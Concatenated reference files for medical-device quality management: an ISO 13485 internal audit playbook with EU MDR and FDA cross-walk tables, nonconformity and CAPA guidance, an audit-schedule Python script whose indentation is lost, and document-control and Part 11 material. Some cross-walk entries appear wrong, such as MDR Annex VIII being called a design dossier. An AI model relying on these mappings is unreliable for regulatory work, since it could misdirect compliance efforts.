### EU MDR cross-walk
| ISO 13485 clause | MDR article / annex |
|---|---|
| 4.2 Documentation | Annex II + Annex III (technical documentation) |
| 5 Management responsibility | Article 10(1)-(9) |
| 6 Resource management | Article 10(13) |
| 7.1 Risk management | Annex I §3 + ISO 14971 |
| 7.3 Design + development | Annex II + Annex VIII (design dossier) |
| 7.4 Purchasing | Article 10(4) + Annex II |
| 7.5.6 Process validation | Annex IX §3 |
| 8.2.1 Post-market surveillance | Article 83 + Article 86 + Annex III |
| 8.5.2 CAPA | Article 87 (vigilance) + Article 89 (CAPA) |
### FDA QSR (21 CFR 820) cross-walk
| ISO 13485 clause | 21 CFR 820 section |
|---|---|
| 4 QMS | 820.20 (Management responsibility) + 820.5 (QMS) |
| 7.3 Design controls | 820.30 |
| 7.4 Purchasing controls | 820.50 |
| 7.5.6 Process validation | 820.75 |
| 8.2.1 Post-market | 820.198 (Complaint files) + 803 (MDR reporting) |
| 8.5.2 CAPA | 820.100 |
In Feb 2024, FDA finalized the rule incorporating ISO 13485:2016 into 21 CFR 820 (the QMSR rule), substantially harmonizing US + international requirements. The compliance date is Feb 2026, after which an ISO 13485-certified QMS substantially satisfies FDA QSR (with FDA-specific overlays on labeling, complaint handling, and MDR reporting).
## Risk Management Audit (ISO 14971 Crosswalk)
Per Clause 7.1 + ISO 14971:2019, the risk management file (RMF) must be maintained for the device lifecycle. Audit should sample:
- Risk management plan exists per product
- Hazard identification covers reasonable foreseeable misuse
- Risk analysis applies probability × severity per ISO 14971
- Risk control measures applied per inherent safety → protective measures → information for safety hierarchy
- Residual risk evaluated + accepted (with rationale)
- Post-production information feeds back into RMF (concept drift equivalent for medical devices)
## CAPA Discipline — The Highest-Stakes Audit Area
CAPA is the #1 cited area in 13485 + QSR audits. Auditors look for:
1. **Containment vs correction vs corrective action distinction**
- Containment: stop the bleeding (short-term)
- Correction: fix the symptom (medium-term)
- Corrective action: prevent recurrence by addressing root cause (long-term)
2. **Root cause analysis depth** — 5 Why minimum; ideally fishbone + Pareto for repeat issues
3. **Effectiveness verification** — measurable evidence the root cause is addressed; not "we updated the procedure"
4. **Time to close** — tracked + reported; aging CAPAs > 90 days are a smell
5. **Trend analysis** — repeat CAPAs across products signal systemic issue
## Cross-Framework Reuse
This ISO 13485 audit playbook supports:
- **EU MDR 745** — design dossier + technical documentation audits (see mdr-745-specialist)
- **FDA QSR (21 CFR 820)** — substantially harmonized post Feb 2026
- **ISO 14971** — risk management file audit integrated with 7.1
- **ISO 42001** for AI-enabled medical devices — A.6 lifecycle controls layer on top of 7.3 design controls
Pair with `compliance-os/references/multi_framework_audit_playbook.md` for medical-device multi-framework programs.
## When This Reference Doesn't Help
- **Specific medical device classification.** See mdr-745-specialist + fda-consultant-specialist.
- **Specific clinical evaluation.** Per MDR Annex XIV; see mdr-745-specialist references.
- **Software as medical device (SaMD).** IEC 62304 specific; see risk-management-specialist + applicable references.
- **External notified body audit.** This is the internal audit playbook; external surveillance audits follow ISO 17021.
---
**Source authorities (non-exhaustive):**
- **ISO 13485:2016** — Medical devices — Quality management systems (the standard)
- **ISO 14971:2019** — Application of risk management to medical devices
- **ISO/IEC 19011:2018** — Guidelines for auditing management systems
- **ISO 17021-1:2015** — Conformity assessment requirements
- **Regulation (EU) 2017/745** — Medical Device Regulation
- **21 CFR 820** — FDA Quality System Regulation (QSR / QMSR post-Feb 2026)
- **FDA Final Rule (Feb 2024)** — Quality Management System Regulation (incorporating ISO 13485 by reference)
- **AAMI TIR45:2012** — Guidance on use of agile practices in development of medical device software
- **IEC 62304:2006/A1:2015** — Medical device software lifecycle
- **GHTF / IMDRF guidance documents** — international harmonization context
FILE:references/nonconformity-classification.md
# Nonconformity Classification
Severity classification, CAPA integration, and finding documentation guidance.
---
## Table of Contents
- [Classification Criteria](#classification-criteria)
- [Severity Matrix](#severity-matrix)
- [CAPA Integration](#capa-integration)
- [Finding Documentation](#finding-documentation)
- [Closure Requirements](#closure-requirements)
---
## Classification Criteria
### Nonconformity Definitions
| Category | Definition | Examples |
|----------|------------|----------|
| Major NC | Systematic failure or absence of required element | No design control procedure, no CAPA system |
| Minor NC | Isolated lapse or partial implementation | Single missing signature, one overdue calibration |
| Observation | Improvement opportunity, potential future NC | Trending toward noncompliance, unclear procedure |
### Classification Decision Tree
```
Is required element absent or failed?
├── Yes → Is failure systematic (multiple instances)?
│ ├── Yes → MAJOR NONCONFORMITY
│ └── No → Could it cause product safety issue?
│ ├── Yes → MAJOR NONCONFORMITY
│ └── No → MINOR NONCONFORMITY
└── No → Is there deviation from procedure?
├── Yes → Isolated or recurring?
│ ├── Isolated → MINOR NONCONFORMITY
│ └── Recurring → MAJOR NONCONFORMITY
└── No → Is there improvement opportunity?
├── Yes → OBSERVATION
└── No → NO FINDING
```
---
## Severity Matrix
### Impact vs. Occurrence Matrix
| | Low Occurrence (1 instance) | Medium (2-3 instances) | High (Systematic) |
|---|---|---|---|
| **High Impact** (Safety/Efficacy) | Major | Major | Major |
| **Medium Impact** (Quality/Compliance) | Minor | Major | Major |
| **Low Impact** (Administrative) | Observation | Minor | Minor |
### Clause-Specific Severity Guidance
| Clause | Major If... | Minor If... |
|--------|-------------|-------------|
| 4.2 Document Control | No document control system | Single obsolete document in use |
| 5.6 Management Review | Not conducted >12 months | Missing single input |
| 6.2 Training | No competency defined | Single training record missing |
| 7.3 Design Control | No design reviews | Review participant missing |
| 7.4 Purchasing | No supplier evaluation | Single evaluation overdue |
| 7.5 Production | Special process not validated | Minor deviation from WI |
| 8.2.2 Internal Audit | No audit program | Audit overdue <90 days |
| 8.5 CAPA | No CAPA system | Effectiveness not verified |
---
## CAPA Integration
### Finding-to-CAPA Workflow
1. **Classify finding** (Major/Minor/Observation)
2. **Document finding** with objective evidence
3. **Determine CAPA requirement** (see table below)
4. **Initiate CAPA** with finding as source
5. **Track resolution** through closure
6. **Verify effectiveness** at follow-up audit
7. **Validation:** Finding closed only after CAPA effective
### CAPA Requirement by Severity
| Severity | CAPA Required | Timeline | Verification |
|----------|---------------|----------|--------------|
| Major | Yes | 30 days for root cause, 90 days for implementation | Next audit or within 6 months |
| Minor | Recommended | 60 days for correction | Next scheduled audit |
| Observation | Optional | As appropriate | Noted at next audit |
### Root Cause Depth by Severity
| Severity | Root Cause Analysis Required |
|----------|------------------------------|
| Major | Full 5-Why or Fishbone, systemic causes |
| Minor | Immediate cause identification |
| Observation | Not required |
---
## Finding Documentation
### Finding Statement Structure
```
FINDING STATEMENT TEMPLATE:
Requirement: [Specific clause or procedure requirement]
Evidence: [What was observed, reviewed, or heard]
Gap: [How the evidence fails to meet the requirement]
Example:
Requirement: ISO 13485:2016 Clause 8.2.2 requires internal audits
at planned intervals to determine QMS conformity.
Evidence: Audit schedule shows Design Control audit planned for
Q2 2024. No audit records exist. Interview with QA Manager
confirmed audit was not conducted.
Gap: Internal audit for Design Control process not conducted as
planned, representing a gap in audit program execution.
```
### Evidence Types and Requirements
| Evidence Type | How to Document | Retention |
|---------------|-----------------|-----------|
| Document | Reference document number, version, date | Copy in audit file |
| Interview | Interviewee name, role, statement summary | Notes in audit file |
| Observation | What, where, when observed | Photo if appropriate |
| Record | Record identifier, date, content observed | Copy in audit file |
### Finding Writing Guidelines
**Do:**
- State objective evidence clearly
- Reference specific requirements
- Use factual, neutral language
- Include document/record identifiers
**Don't:**
- Use judgmental language ("poor", "inadequate")
- Generalize without evidence ("always", "never")
- Combine multiple findings
- Include corrective action suggestions
---
## Closure Requirements
### Closure Criteria by Severity
**Major Nonconformity:**
- [ ] Root cause analysis completed
- [ ] Corrective action implemented
- [ ] Effectiveness verified (objective evidence)
- [ ] No recurrence observed
- [ ] QA Manager sign-off
- [ ] Auditor verification
**Minor Nonconformity:**
- [ ] Immediate correction completed
- [ ] Root cause addressed (if applicable)
- [ ] Evidence of correction reviewed
- [ ] QA Manager sign-off
**Observation:**
- [ ] Action taken (if any) documented
- [ ] Noted for future reference
### Verification Methods
| Method | When to Use |
|--------|-------------|
| Record review | Correction documented in records |
| Interview | Process change understood by personnel |
| Observation | Physical correction verified |
| Follow-up audit | Systematic correction verified over time |
### Closure Documentation
```
CLOSURE RECORD TEMPLATE:
Finding ID: [NC-YYYY-XXX]
Original Finding: [Brief description]
Severity: [Major/Minor/Observation]
Corrective Action Taken:
[Description of action implemented]
Evidence of Implementation:
[Document numbers, dates, observations]
Effectiveness Verification:
[Method used, results, date]
Closure Approved By: [Name, Role, Date]
```
---
## Audit Finding Log
### Log Template
| ID | Date | Clause | Finding | Severity | Status | Due Date | Closed Date |
|----|------|--------|---------|----------|--------|----------|-------------|
| NC-2024-001 | | | | | | | |
| NC-2024-002 | | | | | | | |
### Status Definitions
| Status | Definition |
|--------|------------|
| Open | Finding documented, CAPA not started |
| In Progress | CAPA underway |
| Pending Verification | Action complete, awaiting verification |
| Closed | Effectiveness verified |
| Escalated | Overdue or ineffective, requires management attention |
FILE:scripts/audit_schedule_optimizer.py
#!/usr/bin/env python3
"""
Audit Schedule Optimizer - Risk-Based Internal Audit Planning
Generates optimized audit schedules based on process risk levels,
previous findings, and resource constraints.
Usage:
python audit_schedule_optimizer.py --processes processes.json
python audit_schedule_optimizer.py --interactive
python audit_schedule_optimizer.py --processes processes.json --output json
"""
import argparse
import json
import sys
from dataclasses import dataclass, field, asdict
from datetime import datetime, timedelta
from typing import List, Dict, Optional
from enum import Enum
class RiskLevel(Enum):
HIGH = "High"
MEDIUM = "Medium"
LOW = "Low"
class AuditFrequency(Enum):
QUARTERLY = 90
SEMI_ANNUAL = 180
ANNUAL = 365
EXTENDED = 540 # 18 months
@dataclass
class Process:
name: str
iso_clause: str
risk_level: RiskLevel
last_audit_date: Optional[str] = None
previous_findings: int = 0
criticality_score: int = 5 # 1-10 scale
notes: str = ""
@dataclass
class AuditSlot:
process_name: str
iso_clause: str
scheduled_date: str
risk_level: str
priority_score: float
days_overdue: int = 0
rationale: str = ""
@dataclass
class AuditSchedule:
generated_date: str
schedule_period: str
total_audits: int
audits_by_quarter: Dict[str, int]
schedule: List[Dict]
recommendations: List[str]
class AuditScheduleOptimizer:
"""Optimizer for risk-based audit scheduling."""
# Frequency mapping by risk level
FREQUENCY_MAP = {
RiskLevel.HIGH: AuditFrequency.QUARTERLY,
RiskLevel.MEDIUM: AuditFrequency.SEMI_ANNUAL,
RiskLevel.LOW: AuditFrequency.ANNUAL,
}
# ISO 13485 required processes
REQUIRED_PROCESSES = [
("Document Control", "4.2"),
("Management Review", "5.6"),
("Training and Competency", "6.2"),
("Design Control", "7.3"),
("Purchasing", "7.4"),
("Production Control", "7.5"),
("Equipment Calibration", "7.6"),
("Customer Feedback", "8.2.1"),
("Internal Audit", "8.2.2"),
("Nonconforming Product", "8.3"),
("CAPA", "8.5"),
]
def __init__(self, processes: List[Process], audit_days_per_month: int = 4):
self.processes = processes
self.audit_days_per_month = audit_days_per_month
self.today = datetime.now()
def calculate_priority_score(self, process: Process) -> float:
"""Calculate audit priority score based on multiple factors."""
score = 0.0
# Base risk score (40% weight)
risk_scores = {RiskLevel.HIGH: 10, RiskLevel.MEDIUM: 6, RiskLevel.LOW: 3}
score += risk_scores[process.risk_level] * 0.4
# Overdue factor (30% weight)
if process.last_audit_date:
last_audit = datetime.strptime(process.last_audit_date, "%Y-%m-%d")
days_since = (self.today - last_audit).days
required_frequency = self.FREQUENCY_MAP[process.risk_level].value
overdue_ratio = days_since / required_frequency
score += min(overdue_ratio * 10, 10) * 0.3
else:
# Never audited = highest priority
score += 10 * 0.3
# Previous findings factor (20% weight)
findings_score = min(process.previous_findings * 2, 10)
score += findings_score * 0.2
# Criticality factor (10% weight)
score += process.criticality_score * 0.1
return round(score, 2)
def get_days_overdue(self, process: Process) -> int:
"""Calculate days overdue for audit."""
if not process.last_audit_date:
return 365 # Assume 1 year overdue if never audited
last_audit = datetime.strptime(process.last_audit_date, "%Y-%m-%d")
required_frequency = self.FREQUENCY_MAP[process.risk_level].value
next_due = last_audit + timedelta(days=required_frequency)
days_overdue = (self.today - next_due).days
return max(0, days_overdue)
def generate_schedule(self, months_ahead: int = 12) -> AuditSchedule:
"""Generate optimized audit schedule."""
# Calculate priority scores
prioritized = []
for process in self.processes:
priority = self.calculate_priority_score(process)
overdue = self.get_days_overdue(process)
prioritized.append((process, priority, overdue))
# Sort by priority (descending)
prioritized.sort(key=lambda x: x[1], reverse=True)
# Generate schedule slots
schedule = []
current_date = self.today
audits_per_quarter = {"Q1": 0, "Q2": 0, "Q3": 0, "Q4": 0}
for process, priority, overdue in prioritized:
# Determine schedule date based on priority
if overdue > 0:
# Overdue: schedule within next 30 days
scheduled_date = current_date + timedelta(days=min(30, overdue // 10 + 7))
elif priority > 7:
# High priority: within 60 days
scheduled_date = current_date + timedelta(days=30)
elif priority > 4:
# Medium priority: within 120 days
scheduled_date = current_date + timedelta(days=90)
else:
# Low priority: within 180 days
scheduled_date = current_date + timedelta(days=180)
# Cap at months_ahead
max_date = current_date + timedelta(days=months_ahead * 30)
if scheduled_date > max_date:
scheduled_date = max_date
# Track quarter distribution
quarter = f"Q{(scheduled_date.month - 1) // 3 + 1}"
audits_per_quarter[quarter] += 1
# Generate rationale
rationale_parts = []
if overdue > 0:
rationale_parts.append(f"{overdue} days overdue")
if process.previous_findings > 0:
rationale_parts.append(f"{process.previous_findings} previous findings")
if process.risk_level == RiskLevel.HIGH:
rationale_parts.append("high-risk process")
rationale = "; ".join(rationale_parts) if rationale_parts else "Scheduled per frequency"
slot = AuditSlot(
process_name=process.name,
iso_clause=process.iso_clause,
scheduled_date=scheduled_date.strftime("%Y-%m-%d"),
risk_level=process.risk_level.value,
priority_score=priority,
days_overdue=overdue,
rationale=rationale
)
schedule.append(slot)
# Generate recommendations
recommendations = self._generate_recommendations(prioritized)
return AuditSchedule(
generated_date=self.today.strftime("%Y-%m-%d"),
schedule_period=f"{self.today.strftime('%Y-%m-%d')} to {(self.today + timedelta(days=months_ahead * 30)).strftime('%Y-%m-%d')}",
total_audits=len(schedule),
audits_by_quarter=audits_per_quarter,
schedule=[asdict(s) for s in schedule],
recommendations=recommendations
)
def _generate_recommendations(self, prioritized: List) -> List[str]:
"""Generate recommendations based on analysis."""
recommendations = []
# Check for overdue audits
overdue_count = sum(1 for _, _, overdue in prioritized if overdue > 0)
if overdue_count > 0:
recommendations.append(
f"URGENT: {overdue_count} process(es) overdue for audit. "
"Prioritize these to maintain compliance."
)
# Check for high-risk processes
high_risk_count = sum(1 for p, _, _ in prioritized if p.risk_level == RiskLevel.HIGH)
if high_risk_count > 3:
recommendations.append(
f"High audit burden: {high_risk_count} high-risk processes. "
"Consider quarterly resource allocation."
)
# Check for processes with multiple findings
finding_processes = [(p.name, p.previous_findings) for p, _, _ in prioritized if p.previous_findings >= 3]
if finding_processes:
names = ", ".join([name for name, _ in finding_processes[:3]])
recommendations.append(
f"Recurring issues in: {names}. "
"Consider focused audits or process improvement initiatives."
)
# Check for never-audited processes
never_audited = [p.name for p, _, _ in prioritized if not p.last_audit_date]
if never_audited:
recommendations.append(
f"Never audited: {', '.join(never_audited[:3])}. "
"Include in next audit cycle."
)
if not recommendations:
recommendations.append("Audit program is on track. Maintain scheduled frequency.")
return recommendations
def format_text_output(schedule: AuditSchedule) -> str:
"""Format schedule as text report."""
lines = [
"=" * 70,
"AUDIT SCHEDULE OPTIMIZATION REPORT",
"=" * 70,
f"Generated: {schedule.generated_date}",
f"Period: {schedule.schedule_period}",
f"Total Audits: {schedule.total_audits}",
"",
"Quarterly Distribution:",
]
for q, count in schedule.audits_by_quarter.items():
bar = "█" * count + "░" * (10 - count)
lines.append(f" {q}: {bar} {count}")
lines.extend([
"",
"-" * 70,
"AUDIT SCHEDULE",
"-" * 70,
f"{'Process':<25} {'Clause':<8} {'Date':<12} {'Risk':<8} {'Priority':<8}",
"-" * 70,
])
for audit in schedule.schedule:
lines.append(
f"{audit['process_name']:<25} "
f"{audit['iso_clause']:<8} "
f"{audit['scheduled_date']:<12} "
f"{audit['risk_level']:<8} "
f"{audit['priority_score']:<8}"
)
lines.extend([
"",
"-" * 70,
"RECOMMENDATIONS",
"-" * 70,
])
for i, rec in enumerate(schedule.recommendations, 1):
lines.append(f"{i}. {rec}")
lines.append("=" * 70)
return "\n".join(lines)
def interactive_mode():
"""Run interactive schedule generation."""
print("=" * 60)
print("Audit Schedule Optimizer - Interactive Mode")
print("=" * 60)
processes = []
print("\nEnter processes (blank name to finish):\n")
while True:
name = input("Process name (or Enter to finish): ").strip()
if not name:
break
clause = input("ISO 13485 clause (e.g., 7.3): ").strip()
risk = input("Risk level (H/M/L): ").strip().upper()
risk_level = {
"H": RiskLevel.HIGH,
"M": RiskLevel.MEDIUM,
"L": RiskLevel.LOW
}.get(risk, RiskLevel.MEDIUM)
last_audit = input("Last audit date (YYYY-MM-DD, or Enter if never): ").strip()
if not last_audit:
last_audit = None
findings = input("Previous findings count (default 0): ").strip()
findings = int(findings) if findings.isdigit() else 0
processes.append(Process(
name=name,
iso_clause=clause,
risk_level=risk_level,
last_audit_date=last_audit,
previous_findings=findings
))
print(f"Added: {name}\n")
if not processes:
print("No processes entered. Using default ISO 13485 processes.")
processes = [
Process(name=name, iso_clause=clause, risk_level=RiskLevel.MEDIUM)
for name, clause in AuditScheduleOptimizer.REQUIRED_PROCESSES
]
optimizer = AuditScheduleOptimizer(processes)
schedule = optimizer.generate_schedule()
print("\n" + format_text_output(schedule))
def main():
parser = argparse.ArgumentParser(
description="Risk-Based Audit Schedule Optimizer"
)
parser.add_argument(
"--processes",
type=str,
help="JSON file with process definitions"
)
parser.add_argument(
"--output",
choices=["text", "json"],
default="text",
help="Output format"
)
parser.add_argument(
"--interactive",
action="store_true",
help="Run in interactive mode"
)
parser.add_argument(
"--months",
type=int,
default=12,
help="Planning horizon in months"
)
args = parser.parse_args()
if args.interactive:
interactive_mode()
return
if args.processes:
with open(args.processes, "r") as f:
data = json.load(f)
processes = []
for p in data.get("processes", []):
risk = RiskLevel[p.get("risk_level", "MEDIUM").upper()]
processes.append(Process(
name=p["name"],
iso_clause=p.get("iso_clause", ""),
risk_level=risk,
last_audit_date=p.get("last_audit_date"),
previous_findings=p.get("previous_findings", 0),
criticality_score=p.get("criticality_score", 5)
))
else:
# Use default processes
processes = [
Process(name=name, iso_clause=clause, risk_level=RiskLevel.MEDIUM)
for name, clause in AuditScheduleOptimizer.REQUIRED_PROCESSES
]
optimizer = AuditScheduleOptimizer(processes)
schedule = optimizer.generate_schedule(args.months)
if args.output == "json":
print(json.dumps(asdict(schedule), indent=2))
else:
print(format_text_output(schedule))
if __name__ == "__main__":
main()
Kiểm soát tài liệu QMS thiết bị y tế: đánh số, quản lý phiên bản, kiểm soát thay đổi và tuân thủ chữ ký điện tử 21 CFR Part 11.
---
name: "quality-documentation-manager"
description: Document control system management for medical device QMS. Covers document numbering, version control, change management, and 21 CFR Part 11 compliance. Use for document control procedures, change control workflow, document numbering, version management, electronic signature compliance, or regulatory documentation review.
triggers:
- document control
- document numbering
- version control
- change control
- document approval
- electronic signature
- 21 CFR Part 11
- audit trail
- document lifecycle
- controlled document
- document master list
- record retention
---
# Quality Documentation Manager
Document control system design and management for ISO 13485-compliant quality management systems, including numbering conventions, approval workflows, change control, and electronic record compliance.
---
## Table of Contents
- [Document Control Workflow](#document-control-workflow)
- [Document Numbering System](#document-numbering-system)
- [Approval and Review Process](#approval-and-review-process)
- [Change Control Process](#change-control-process)
- [21 CFR Part 11 Compliance](#21-cfr-part-11-compliance)
- [Reference Documentation](#reference-documentation)
- [Tools](#tools)
---
## Document Control Workflow
Implement document control from creation through obsolescence:
1. Assign document number per numbering procedure
2. Create document using controlled template
3. Route for review to required reviewers
4. Address review comments and document responses
5. Obtain required approval signatures
6. Assign effective date and distribute
7. Update Document Master List
8. **Validation:** Document accessible at point of use; obsolete versions removed
### Document Lifecycle Stages
| Stage | Definition | Actions Required |
|-------|------------|------------------|
| Draft | Under creation or revision | Author editing, not for use |
| Review | Circulated for review | Reviewers provide feedback |
| Approved | All signatures obtained | Ready for training/distribution |
| Effective | Training complete, released | Available for use |
| Superseded | Replaced by newer revision | Remove from active use |
| Obsolete | No longer applicable | Archive per retention schedule |
### Document Types and Prefixes
| Prefix | Document Type | Typical Content |
|--------|---------------|-----------------|
| QM | Quality Manual | QMS overview, scope, policy |
| SOP | Standard Operating Procedure | Process-level procedures |
| WI | Work Instruction | Task-level step-by-step |
| TF | Template/Form | Controlled forms |
| SPEC | Specification | Product/process specs |
| PLN | Plan | Quality/project plans |
### Required Reviewers by Document Type
| Document Type | Required Reviewers | Required Approvers |
|---------------|-------------------|-------------------|
| SOP | Process Owner, QA | QA Manager, Process Owner |
| WI | Area Supervisor, QA | Area Manager |
| SPEC | Engineering, QA | Engineering Manager, QA |
| TF | Process Owner | QA |
| Design Documents | Design Team, QA | Design Control Authority |
---
## Document Numbering System
Assign consistent document numbers for identification and retrieval.
### Numbering Format
Standard format: `PREFIX-CATEGORY-SEQUENCE[-REVISION]`
```
Example: SOP-02-001-A
SOP = Document type (Standard Operating Procedure)
02 = Category code (Document Control)
001 = Sequential number
A = Revision indicator
```
### Category Codes
| Code | Functional Area | Description |
|------|-----------------|-------------|
| 01 | Quality Management | QMS procedures, management review |
| 02 | Document Control | This area |
| 03 | Human Resources | Training, competency |
| 04 | Design & Development | Design control processes |
| 05 | Purchasing | Supplier management |
| 06 | Production | Manufacturing procedures |
| 07 | Quality Control | Inspection, testing |
| 08 | CAPA | Corrective/preventive actions |
| 09 | Risk Management | ISO 14971 processes |
| 10 | Regulatory Affairs | Submissions, compliance |
### Numbering Workflow
1. Author requests document number from Document Control
2. Document Control verifies category assignment
3. Document Control assigns next available sequence number
4. Number recorded in Document Master List
5. Author creates document using assigned number
6. **Validation:** Number format matches standard; no duplicates in Master List
### Revision Designation
| Change Type | Revision Increment | Example |
|-------------|-------------------|---------|
| Major revision | Increment number | Rev 01 → Rev 02 |
| Minor revision | Increment sub-revision | Rev 01 → Rev 01.1 |
| Administrative | No change or letter suffix | Rev 01 → Rev 01a |
See `references/document-control-procedures.md` for complete numbering guidance.
---
## Approval and Review Process
Obtain required reviews and approvals before document release.
### Review Workflow
1. Author completes document draft
2. Author submits for review via routing form or DMS
3. Reviewers assigned based on document type
4. Reviewers provide comments within review period (5-10 business days)
5. Author addresses comments and documents responses
6. Author resubmits revised document
7. Approvers sign and date
8. **Validation:** All required reviewers completed; all comments addressed with documented disposition
### Comment Disposition
| Disposition | Action Required |
|-------------|-----------------|
| Accept | Incorporate comment as written |
| Accept with modification | Incorporate with changes, document rationale |
| Reject | Do not incorporate, document justification |
| Defer | Address in future revision, document reason |
### Approval Matrix
```
Document Level 1 (Policy/QM): CEO or delegate + QA Manager
Document Level 2 (SOP): Department Manager + QA Manager
Document Level 3 (WI/TF): Area Supervisor + QA Representative
```
### Signature Requirements
| Element | Requirement |
|---------|-------------|
| Name | Printed name of signer |
| Signature | Handwritten or electronic signature |
| Date | Date signature applied |
| Role | Function/role of signer |
---
## Change Control Process
Manage document changes systematically through review and approval.
### Change Control Workflow
1. Identify need for document change
2. Complete Change Request Form with justification
3. Document Control assigns change number and logs request
4. Route to reviewers for impact assessment
5. Obtain approvals based on change classification
6. Author implements approved changes
7. Update revision number and change history
8. **Validation:** Changes match approved scope; change history complete
### Change Classification
| Class | Definition | Approval Level | Examples |
|-------|------------|----------------|----------|
| Administrative | No content impact | Document Control | Typos, formatting |
| Minor | Limited content change | Process Owner + QA | Clarifications |
| Major | Significant content change | Full review cycle | New requirements |
| Emergency | Urgent safety/compliance | Expedited + retrospective | Safety issues |
### Impact Assessment Checklist
| Impact Area | Assessment Questions |
|-------------|---------------------|
| Training | Does change require retraining? |
| Equipment | Does change affect equipment or systems? |
| Validation | Does change require revalidation? |
| Regulatory | Does change affect regulatory filings? |
| Other Documents | Which related documents need updating? |
| Records | What records are affected? |
### Change History Documentation
Each document must include change history:
```
| Revision | Date | Description | Author | Approver |
|----------|------|-------------|--------|----------|
| 01 | 2023-01-15 | Initial release | J. Smith | M. Jones |
| 02 | 2024-03-01 | Updated workflow | J. Smith | M. Jones |
```
---
## 21 CFR Part 11 Compliance
Implement electronic record and signature controls for FDA compliance.
### Part 11 Scope
| Applies To | Does Not Apply To |
|------------|-------------------|
| Records required by FDA regulations | Paper records |
| Records submitted to FDA | Internal non-regulated documents |
| Electronic signatures on required records | General email communication |
### Electronic Record Controls
1. Validate system for accuracy and reliability
2. Implement secure audit trail for all changes
3. Restrict system access to authorized individuals
4. Generate accurate copies in human-readable format
5. Protect records throughout retention period
6. **Validation:** Audit trail captures who, what, when for all changes
### Audit Trail Requirements
| Requirement | Implementation |
|-------------|----------------|
| Secure | Cannot be modified by users |
| Computer-generated | System creates automatically |
| Time-stamped | Date and time of each action |
| Original values | Previous values retained |
| User identity | Who made each change |
### Electronic Signature Requirements
| Requirement | Implementation |
|-------------|----------------|
| Unique to individual | Not shared between persons |
| At least 2 components | User ID + password minimum |
| Signature manifestation | Name, date/time, meaning displayed |
| Linked to record | Cannot be excised or copied |
### Signature Manifestation
Every electronic signature must display:
| Element | Example |
|---------|---------|
| Printed name | John Smith |
| Date and time | 2024-03-15 14:32:05 EST |
| Meaning | Approved for Release |
### System Controls Checklist
**Access Controls:**
- [ ] Unique user ID for each person
- [ ] Password complexity enforced
- [ ] Account lockout after failed attempts
- [ ] Session timeout after inactivity
**Audit Trail:**
- [ ] All record creation logged
- [ ] All modifications logged with old/new values
- [ ] User identity captured
- [ ] Date/time stamp on all entries
**Security:**
- [ ] Role-based access control
- [ ] Encryption for data at rest and in transit
- [ ] Regular backup and tested recovery
See `references/21cfr11-compliance-guide.md` for detailed compliance requirements.
---
## Reference Documentation
### Document Control Procedures
`references/document-control-procedures.md` contains:
- Document numbering system and format
- Document lifecycle stages and transitions
- Review and approval workflow details
- Change control process with classification criteria
- Distribution and access control methods
- Record retention periods and disposal procedures
- Document Master List requirements
### 21 CFR Part 11 Compliance Guide
`references/21cfr11-compliance-guide.md` contains:
- Part 11 scope and applicability
- Electronic record requirements (§11.10)
- Electronic signature requirements (§11.50, 11.100, 11.200)
- System control specifications
- Validation approach and documentation
- Compliance checklist and gap assessment template
- Common FDA deficiencies and prevention
---
## Tools
### Document Validator
```bash
# Validate document metadata
python scripts/document_validator.py --doc document.json
# Interactive validation mode
python scripts/document_validator.py --interactive
# JSON output for integration
python scripts/document_validator.py --doc document.json --output json
# Generate sample document JSON
python scripts/document_validator.py --sample > sample_doc.json
```
Validates:
- Document numbering convention compliance
- Title and status requirements
- Date validation (effective, review due)
- Approval requirements by document type
- Change history completeness
- 21 CFR Part 11 controls (audit trail, signatures)
### Sample Document Input
```json
{
"number": "SOP-02-001",
"title": "Document Control Procedure",
"doc_type": "SOP",
"revision": "03",
"status": "Effective",
"effective_date": "2024-01-15",
"review_date": "2025-01-15",
"author": "J. Smith",
"approver": "M. Jones",
"change_history": [
{"revision": "01", "date": "2022-01-01", "description": "Initial release"},
{"revision": "02", "date": "2023-01-15", "description": "Updated workflow"},
{"revision": "03", "date": "2024-01-15", "description": "Added e-signature requirements"}
],
"has_audit_trail": true,
"has_electronic_signature": true,
"signature_components": 2
}
```
---
## Document Control Metrics
Track document control system performance.
### Key Performance Indicators
| Metric | Target | Calculation |
|--------|--------|-------------|
| Document cycle time | <30 days | Average days from draft to effective |
| Review completion rate | >95% | Reviews completed on time / Total reviews |
| Change request backlog | <10 | Open change requests at month end |
| Overdue review rate | <5% | Documents past review date / Total effective |
| Audit finding rate | <2 per audit | Document control findings per internal audit |
### Periodic Review Schedule
| Document Type | Review Frequency |
|---------------|------------------|
| Policy | Every 3 years |
| SOP | Every 2 years |
| WI | Every 2 years |
| Specifications | As needed or with product changes |
| Forms/Templates | Every 3 years |
---
## Regulatory Requirements
### ISO 13485:2016 Clause 4.2
| Sub-clause | Requirement |
|------------|-------------|
| 4.2.1 | Quality management system documentation |
| 4.2.2 | Quality manual |
| 4.2.3 | Medical device file (technical documentation) |
| 4.2.4 | Control of documents |
| 4.2.5 | Control of records |
### FDA 21 CFR 820
| Section | Requirement |
|---------|-------------|
| 820.40 | Document controls |
| 820.180 | General record requirements |
| 820.181 | Device master record |
| 820.184 | Device history record |
| 820.186 | Quality system record |
### Common Audit Findings
| Finding | Prevention |
|---------|------------|
| Obsolete documents in use | Implement distribution control |
| Missing approval signatures | Enforce workflow before release |
| Incomplete change history | Require history update with each revision |
| No periodic review schedule | Establish and enforce review calendar |
| Inadequate audit trail | Validate DMS for Part 11 compliance |
FILE:references/21cfr11-compliance-guide.md
# 21 CFR Part 11 Compliance Guide
Electronic records and electronic signatures compliance for FDA-regulated systems.
---
## Table of Contents
- [Part 11 Overview](#part-11-overview)
- [Electronic Record Requirements](#electronic-record-requirements)
- [Electronic Signature Requirements](#electronic-signature-requirements)
- [System Controls](#system-controls)
- [Validation Requirements](#validation-requirements)
- [Compliance Checklist](#compliance-checklist)
---
## Part 11 Overview
### Scope and Applicability
21 CFR Part 11 applies to electronic records and signatures used to meet FDA predicate rule requirements.
| Applies To | Does Not Apply To |
|------------|-------------------|
| Records required by FDA regulations | Paper records |
| Records submitted to FDA | Internal documents not required by regulation |
| Electronic signatures on required records | Digital communication (email) for general purposes |
| Systems creating/maintaining regulated records | Non-regulated systems |
### Key Terms
| Term | Definition |
|------|------------|
| Electronic Record | Any combination of text, graphics, data in digital form |
| Electronic Signature | Computer data compilation intended as legally binding signature |
| Digital Signature | Electronic signature based on cryptographic methods |
| Closed System | Environment with controlled access by responsible persons |
| Open System | Environment with uncontrolled access |
| Audit Trail | Secure, computer-generated, time-stamped record |
### Predicate Rules
Part 11 does not create new record requirements. It governs HOW records are maintained when electronic:
